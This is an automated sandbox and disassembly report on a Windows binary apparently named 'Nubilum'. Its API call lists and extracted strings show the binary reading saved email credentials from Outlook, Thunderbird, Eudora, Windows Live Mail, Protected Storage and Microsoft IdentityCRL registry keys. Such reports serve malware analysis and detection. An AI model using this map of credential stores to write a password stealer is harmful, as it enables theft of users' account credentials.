34006 40466b _mbscpy 33983->34006 33985 40f6fa 33986 4045db 7 API calls 33985->33986 33987 40f708 33986->33987 33988 40f7e2 33987->33988 33989 404734 3 API calls 33987->33989 33990 404656 FreeLibrary 33988->33990 33994 40f715 33989->33994 33991 40f7f1 33990->33991 33992 404785 FreeLibrary 33991->33992 33993 40f7fc 33992->33993 33993->33840 33994->33988 33995 40f797 WideCharToMultiByte 33994->33995 33996 40f7b8 strlen 33995->33996 33997 40f7d9 LocalFree 33995->33997 33996->33997 33998 40f7c8 _mbscpy 33996->33998 33997->33988 33998->33997 33999->33840 34001 4078e6 34000->34001 34002 4078c7 _mbsnbcat 34001->34002 34003 4078ea 34001->34003 34002->34001 34003->33965 34004->33973 34005->33976 34006->33985 34020 410a9c RegOpenKeyExA 34007->34020 34009 44458b 34010 40381a 34009->34010 34021 410add RegQueryValueExA 34009->34021 34010->33848 34018 4021b6 memset 34010->34018 34012 4445dc RegCloseKey 34012->34010 34013 4445a4 34013->34012 34022 410add RegQueryValueExA 34013->34022 34015 4445c1 34015->34012 34023 444879 30 API calls 34015->34023 34017 4445da 34017->34012 34018->33850 34019->33848 34020->34009 34021->34013 34022->34015 34023->34017 34024->33871 34026 4075c9 34025->34026 34027 4075bb _mbscat 34025->34027 34028 444212 34026->34028 34027->34026 34045 407e9d 34028->34045 34031 44424d 34032 444274 34031->34032 34033 444258 34031->34033 34053 407ef8 34031->34053 34034 407e9d 9 API calls 34032->34034 34066 444196 52 API calls 34033->34066 34041 4442a0 34034->34041 34036 407ef8 9 API calls 34036->34041 34037 4442ce 34063 407f90 34037->34063 34041->34036 34041->34037 34043 444212 65 API calls 34041->34043 34067 407e62 strcmp strcmp 34041->34067 34042 407f90 FindClose 34044 4442e4 34042->34044 34043->34041 34044->33893 34046 407f90 FindClose 34045->34046 34047 407eaa 34046->34047 34048 406f06 2 API calls 34047->34048 34049 407ebd strlen strlen 34048->34049 34050 407ee1 34049->34050 34052 407eea 34049->34052 34068 4070e3 strlen _mbscat _mbscpy _mbscat 34050->34068 34052->34031 34054 407f03 FindFirstFileA 34053->34054 34055 407f24 FindNextFileA 34053->34055 34056 407f3f 34054->34056 34057 407f46 strlen strlen 34055->34057 34058 407f3a 34055->34058 34056->34057 34060 407f7f 34056->34060 34057->34060 34061 407f76 34057->34061 34059 407f90 FindClose 34058->34059 34059->34056 34060->34031 34069 4070e3 strlen _mbscat _mbscpy _mbscat 34061->34069 34064 407fa3 34063->34064 34065 407f99 FindClose 34063->34065 34064->34042 34065->34064 34066->34031 34067->34041 34068->34052 34069->34060 34070->33493 34071->33496 34072->33504 34073->33503 34074->33510 34075->33507 34076->33502 34421 43ffc8 18 API calls 34235 4281cc 15 API calls __fprintf_l 34423 4383cc 110 API calls __fprintf_l 34236 4275d3 41 API calls 34424 4153d3 22 API calls __fprintf_l 34237 444dd7 _XcptFilter 34429 4013de 15 API calls 34431 425115 111 API calls __fprintf_l 34432 43f7db 18 API calls 34435 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34239 4335ee 16 API calls __fprintf_l 34437 429fef 11 API calls 34240 444deb _exit _c_exit 34438 40bbf0 138 API calls 34243 425115 79 API calls __fprintf_l 34442 437ffa 22 API calls 34247 4021ff 14 API calls 34248 43f5fc 149 API calls 34443 40e381 9 API calls 34250 405983 40 API calls 34251 42b186 27 API calls __fprintf_l 34252 427d86 76 API calls 34253 403585 20 API calls 34255 42e58e 18 API calls __fprintf_l 34258 425115 75 API calls __fprintf_l 34260 401592 8 API calls 33161 410b92 33164 410a6b 33161->33164 33163 410bb2 33165 410a77 33164->33165 33166 410a89 GetPrivateProfileIntA 33164->33166 33169 410983 memset _itoa WritePrivateProfileStringA 33165->33169 33166->33163 33168 410a84 33168->33163 33169->33168 34447 434395 16 API calls 34262 441d9c memcmp 34449 43f79b 119 API calls 34263 40c599 43 API calls 34450 426741 87 API calls 34267 4401a6 21 API calls 34269 426da6 memcpy memset memset memcpy 34270 4335a5 15 API calls 34272 4299ab memset memset memcpy memset memset 34273 40b1ab 8 API calls 34455 425115 76 API calls __fprintf_l 34459 4113b2 18 API calls 2 library calls 34463 40a3b8 memset sprintf SendMessageA 34077 410bbc 34080 4109cf 34077->34080 34081 4109dc 34080->34081 34082 410a23 memset GetPrivateProfileStringA 34081->34082 34083 4109ea memset 34081->34083 34088 407646 strlen 34082->34088 34093 4075cd sprintf memcpy 34083->34093 34086 410a0c WritePrivateProfileStringA 34087 410a65 34086->34087 34089 40765a 34088->34089 34090 40765c 34088->34090 34089->34087 34092 4076a3 34090->34092 34094 40737c strtoul 34090->34094 34092->34087 34093->34086 34094->34090 34275 40b5bf memset memset _mbsicmp

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                          APIs
                          • memset.MSVCRT ref: 0040832F
                          • memset.MSVCRT ref: 00408343
                          • memset.MSVCRT ref: 0040835F
                          • memset.MSVCRT ref: 00408376
                          • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                          • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                          • strlen.MSVCRT ref: 004083E9
                          • strlen.MSVCRT ref: 004083F8
                          • memcpy.MSVCRT ref: 0040840A
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                          • String ID: 5$H$O$b$i$}$}
                          • API String ID: 1832431107-3760989150
                          • Opcode ID: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                          • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                          • Opcode Fuzzy Hash: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                          • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                          APIs
                          • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                          • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                          • strlen.MSVCRT ref: 00407F5C
                          • strlen.MSVCRT ref: 00407F64
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: FileFindstrlen$FirstNext
                          • String ID: ACD
                          • API String ID: 379999529-620537770
                          • Opcode ID: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                          • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                          • Opcode Fuzzy Hash: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                          • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                          Control-flow Graph

                          APIs
                          • memset.MSVCRT ref: 00401E8B
                          • strlen.MSVCRT ref: 00401EA4
                          • strlen.MSVCRT ref: 00401EB2
                          • strlen.MSVCRT ref: 00401EF8
                          • strlen.MSVCRT ref: 00401F06
                          • memset.MSVCRT ref: 00401FB1
                          • atoi.MSVCRT ref: 00401FE0
                          • memset.MSVCRT ref: 00402003
                          • sprintf.MSVCRT ref: 00402030
                            • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                          • memset.MSVCRT ref: 00402086
                          • memset.MSVCRT ref: 0040209B
                          • strlen.MSVCRT ref: 004020A1
                          • strlen.MSVCRT ref: 004020AF
                          • strlen.MSVCRT ref: 004020E2
                          • strlen.MSVCRT ref: 004020F0
                          • memset.MSVCRT ref: 00402018
                            • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                            • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                          • _mbscpy.MSVCRT ref: 00402177
                          • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00402181
                          • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040219C
                            • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                          • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                          • API String ID: 1846531875-4223776976
                          • Opcode ID: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                          • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                          • Opcode Fuzzy Hash: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                          • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll,771B0A60,?,00000000,?,?,?,0040CF60,771B0A60), ref: 00404AB8
                            • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                            • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,771B0A60), ref: 00404ADE
                            • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040D190
                          • DeleteObject.GDI32(?), ref: 0040D1A6
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                          • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                          • API String ID: 745651260-375988210
                          • Opcode ID: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                          • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                          • Opcode Fuzzy Hash: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                          • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                          Control-flow Graph

                          APIs
                            • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                          • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                          • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                          • _mbscpy.MSVCRT ref: 00403E54
                          Strings
                          • pstorec.dll, xrefs: 00403C30
                          • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                          • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                          • PStoreCreateInstance, xrefs: 00403C44
                          • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                          • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                          • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                          • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                          • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                          • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                          • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                          • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: Library$AddressFreeLoadProc_mbscpy
                          • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                          • API String ID: 1197458902-317895162
                          • Opcode ID: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                          • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                          • Opcode Fuzzy Hash: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                          • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 231 44b49f-44b4b0 call 444e38 GetModuleHandleA 235 444c87-444d00 __set_app_type __p__fmode __p__commode call 444e34 231->235 236 444c68-444c73 231->236 242 444d02-444d0d __setusermatherr 235->242 243 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 235->243 236->235 237 444c75-444c85 236->237 237->235 242->243 246 444d6a-444d72 243->246 247 444d74-444d76 246->247 248 444d78-444d7b 246->248 247->246 247->248 249 444d81-444d85 248->249 250 444d7d-444d7e 248->250 251 444d87-444d89 249->251 252 444d8b-444dc6 GetStartupInfoA GetModuleHandleA call 40cf44 249->252 250->249 251->250 251->252 257 444dcf-444e0f _cexit call 444e71 252->257 258 444dc8-444dc9 exit 252->258 258->257
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                          • String ID: h4ND$k{v
                          • API String ID: 3662548030-3410959870
                          • Opcode ID: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                          • Instruction ID: 35bbd85eb0bb2ce5e1f1b9c4bc8677619723fc104b62ea38f54f9f601267cc63
                          • Opcode Fuzzy Hash: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                          • Instruction Fuzzy Hash: D941D3B5C023449FEB619FA4DC847AD7BB4FB49325B28412BE451A32A1D7788D41CB5C

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 262 40fb00-40fb35 call 44b090 RegOpenKeyExA 265 40fc37-40fc3d 262->265 266 40fb3b-40fb4f RegOpenKeyExA 262->266 267 40fb55-40fb7e RegQueryValueExA 266->267 268 40fc2d-40fc31 RegCloseKey 266->268 269 40fc23-40fc27 RegCloseKey 267->269 270 40fb84-40fb93 call 404734 267->270 268->265 269->268 270->269 273 40fb99-40fbd1 call 4047a5 270->273 273->269 276 40fbd3-40fbdb 273->276 277 40fc19-40fc1d LocalFree 276->277 278 40fbdd-40fc14 memcpy * 2 call 40f802 276->278 277->269 278->277
                          APIs
                          • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                          • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                          • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                            • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                            • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                          • memcpy.MSVCRT ref: 0040FBE4
                          • memcpy.MSVCRT ref: 0040FBF9
                            • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                            • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                            • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                            • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                          • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                          • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                          • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                          • API String ID: 2768085393-1693574875
                          • Opcode ID: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                          • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                          • Opcode Fuzzy Hash: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                          • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A

                          Control-flow Graph

                          APIs
                          • memset.MSVCRT ref: 0044430B
                            • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                            • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                            • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                            • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                            • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                            • Part of subcall function 00410DBB: _mbscpy.MSVCRT ref: 00410E87
                          • memset.MSVCRT ref: 00444379
                          • memset.MSVCRT ref: 00444394
                            • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                          • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                          • strlen.MSVCRT ref: 004443DB
                          • _strcmpi.MSVCRT ref: 00444401
                          Strings
                          • \Microsoft\Windows Live Mail, xrefs: 00444350
                          • Store Root, xrefs: 004443A5
                          • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                          • \Microsoft\Windows Mail, xrefs: 00444329
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                          • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                          • API String ID: 832325562-2578778931
                          • Opcode ID: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                          • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                          • Opcode Fuzzy Hash: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                          • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 301 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 306 40f5c3-40f5ea RegQueryValueExA 301->306 307 40f6d9-40f6df 301->307 308 40f6d0-40f6d3 RegCloseKey 306->308 309 40f5f0-40f5f4 306->309 308->307 309->308 310 40f5fa-40f604 309->310 311 40f606-40f618 call 40466b call 404734 310->311 312 40f677 310->312 322 40f66a-40f675 call 404785 311->322 323 40f61a-40f63e call 4047a5 311->323 313 40f67a-40f67d 312->313 313->308 315 40f67f-40f6bf call 4012ee RegQueryValueExA 313->315 315->308 321 40f6c1-40f6cf 315->321 321->308 322->313 323->322 328 40f640-40f643 323->328 329 40f661-40f664 LocalFree 328->329 330 40f645-40f65a memcpy 328->330 329->322 330->329
                          APIs
                          • memset.MSVCRT ref: 0040F567
                          • memset.MSVCRT ref: 0040F57F
                            • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                          • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                            • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                            • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                            • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                          • memcpy.MSVCRT ref: 0040F652
                          • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                          • String ID:
                          • API String ID: 2012582556-3916222277
                          • Opcode ID: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                          • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                          • Opcode Fuzzy Hash: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                          • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 331 4037ca-40381c memset * 2 call 444551 334 4038e2-4038e5 331->334 335 403822-403882 call 4021b6 call 406f06 * 2 strchr 331->335 342 403884-403895 _mbscpy 335->342 343 403897-4038a2 strlen 335->343 344 4038bf-4038dd _mbscpy call 4023e5 342->344 343->344 345 4038a4-4038bc sprintf 343->345 344->334 345->344
                          APIs
                          • memset.MSVCRT ref: 004037EB
                          • memset.MSVCRT ref: 004037FF
                            • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                            • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                            • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                            • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                          • strchr.MSVCRT ref: 0040386E
                          • _mbscpy.MSVCRT ref: 0040388B
                          • strlen.MSVCRT ref: 00403897
                          • sprintf.MSVCRT ref: 004038B7
                          • _mbscpy.MSVCRT ref: 004038CD
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                          • String ID: %s@yahoo.com
                          • API String ID: 317221925-3288273942
                          • Opcode ID: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                          • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                          • Opcode Fuzzy Hash: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                          • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 347 404a99-404ac2 LoadLibraryA 348 404ac4-404ad2 GetProcAddress 347->348 349 404aec-404af4 347->349 350 404ad4-404ad8 348->350 351 404add-404ae6 FreeLibrary 348->351 354 404af5-404afa 349->354 355 404adb 350->355 351->349 353 404ae8-404aea 351->353 353->354 356 404b13-404b17 354->356 357 404afc-404b12 MessageBoxA 354->357 355->351
                          APIs
                          • LoadLibraryA.KERNEL32(comctl32.dll,771B0A60,?,00000000,?,?,?,0040CF60,771B0A60), ref: 00404AB8
                          • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                          • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,771B0A60), ref: 00404ADE
                          • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                          Strings
                          Memory Dump Source
